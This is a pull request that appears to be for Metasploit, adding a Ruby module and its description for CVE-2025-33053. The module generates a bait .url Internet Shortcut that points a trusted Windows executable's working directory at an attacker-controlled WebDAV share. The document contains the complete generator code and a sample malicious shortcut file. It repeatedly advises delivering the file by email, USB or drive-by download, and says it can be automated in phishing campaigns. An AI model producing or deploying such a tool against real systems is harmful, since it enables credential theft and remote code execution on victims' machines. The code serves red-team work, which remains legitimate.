### PR TITLE
Adds auxiliary module for CVE-2025-33053 .url file generator

### DIFF
--- a/modules/auxiliary/gather/cve_2025_33053.rb
+++ b/modules/auxiliary/gather/cve_2025_33053.rb
@@ -1,0 +1,68 @@
+##
+# CVE-2025-33053 .URL Generator - Full Options
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'CVE-2025-33053 .URL File Generator',
+      'Description' => %q{
+        Generates a .url file that abuses CVE-2025-33053 to achieve RCE via a UNC path
+        pointing to a malicious WebDAV share. This works by setting the WorkingDirectory
+        to a remote UNC path while referencing a trusted LOLBAS executable.
+      },
+      'Author'      => [ 'Dev Bui Hieu'],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2025-33053'],
+          ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
+        ],
+      'DisclosureDate' => '2025-06-11'
+    ))
+
+    register_options(
+      [
+        OptString.new('IP', [true, 'Attacker IP address or domain for UNC path']),
+        OptString.new('SHARE', [false, 'WebDAV share name (default: webdav)', 'webdav']),
+        OptString.new('OUTFILE', [false, 'Output .url file name (default: bait.url)', 'bait.url']),
+        OptString.new('EXE', [false, 'LOLBAS executable path on victim', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
+        OptString.new('ICON', [false, 'Icon file path', 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe']),
+        OptInt.new('INDEX', [false, 'Icon index', 13]),
+        OptString.new('MODIFIED', [false, 'Modified hex timestamp', '20F06BA06D07BD014D'])
+      ]
+    )
+  end
+
+  def run
+    ip       = datastore['IP']
+    share    = datastore['SHARE'] || 'webdav'
+    outfile  = datastore['OUTFILE'] || 'bait.url'
+    exe      = datastore['EXE'] || 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe'
+    icon     = datastore['ICON'] || 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'
+    index    = datastore['INDEX'] || 13
+    modified = datastore['MODIFIED'] || '20F06BA06D07BD014D'
+
+    unc_path = "\\\\#{ip}\\#{share}\\"
+
+    url_content = <<~EOF
+      [InternetShortcut]
+      URL=#{exe}
+      WorkingDirectory=#{unc_path}
+      ShowCommand=7
+      IconIndex=#{index}
+      IconFile=#{icon}
+      Modified=#{modified}
+    EOF
+
+    out_path = ::File.join(Msf::Config.local_directory, outfile)
+    File.write(out_path, url_content)
+
+    print_good("✔ .url file created at: #{out_path}")
+    print_status("UNC path: #{unc_path}")
+    print_status("Deliver the file via email, USB, or drive-by download.")
+  end
+end


### PR DESCRIPTION
# Add auxiliary module for CVE-2025-33053: Remote Code Execution via .URL File and UNC WebDAV Path

## Overview

This pull request adds a new **auxiliary module** that generates a specially crafted `.url` (Internet Shortcut) file designed to exploit **CVE-2025-33053**, a **remote code execution** vulnerability affecting Microsoft Windows.

The exploit abuses the way `.url` files handle the `WorkingDirectory` field when it points to a remote **UNC path (WebDAV)**. When the file is opened on a victim's machine, the referenced executable (e.g., `iediagcmd.exe`) is launched with the working directory set to an attacker-controlled WebDAV share, which can lead to:

- NTLM credential theft
- Arbitrary command execution
- Unintended file access or DLL loading

The module simplifies the generation of such `.url` files by allowing the user to specify only the **attacker IP**, with optional customization for executable path, icon, share name, and other fields.

> ⚠️ This module is for internal red team assessments and security research only.

---

## Module Details

- **Author**: Dev Bui Hieu
- **Type**: Auxiliary
- **Category**: Gather
- **Path**: `modules/auxiliary/gather/cve_2025_33053.rb`
- **CVE**: [CVE-2025-33053](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
- **Exploit Type**: Social engineering, drive-by download, phishing, or USB drop
- **Function**: Generates `.url` payloads for phishing or local exploitation

---

## Features

- Generates `.url` file with UNC-based working directory path
- Customizable fields:
  - `--ip` (attacker's WebDAV server) – required
  - `--share` (default: webdav)
  - `--out` (filename, default: `bait.url`)
  - `--exe` (default: `C:\Program Files\Internet Explorer\iediagcmd.exe`)
  - `--icon` (default: Edge icon)
  - `--index` and `--modified` metadata
- Built-in safe defaults
- Easy to automate in phishing campaigns or red team drops

---

## Example Usage

```bash
use auxiliary/gather/cve_2025_33053
set IP 192.168.1.100
set OUTFILE test.url
run
```

This will generate a .url file containing:

```ini
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
```

Deliver this file to the target via email, drive-by download, or USB.